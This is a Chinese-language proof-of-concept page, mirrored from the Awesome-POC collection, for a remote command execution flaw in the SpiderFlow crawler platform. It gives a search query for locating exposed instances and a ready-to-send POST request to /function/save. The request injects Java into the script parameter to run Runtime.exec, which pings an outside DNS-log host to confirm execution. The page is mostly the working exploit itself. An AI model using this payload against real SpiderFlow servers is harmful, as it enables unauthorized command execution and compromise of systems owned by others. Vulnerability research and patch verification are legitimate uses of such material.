mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-06 19:38:09 +00:00
35 lines
589 B
Markdown
35 lines
589 B
Markdown
|
|
# SpiderFlow save 远程命令执行漏洞
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
SpiderFlow 平台以流程图的⽅式定义爬虫,是⼀个高度灵活可配置的爬虫平台
|
|||
|
|
|
|||
|
|
官⽹:https://www.spiderflow.org/
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
SpiderFlow
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 网络测绘
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
title=="SpiderFlow"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
主页面
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
发送请求包执行命令
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
POST /function/save
|
|||
|
|
|
|||
|
|
id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|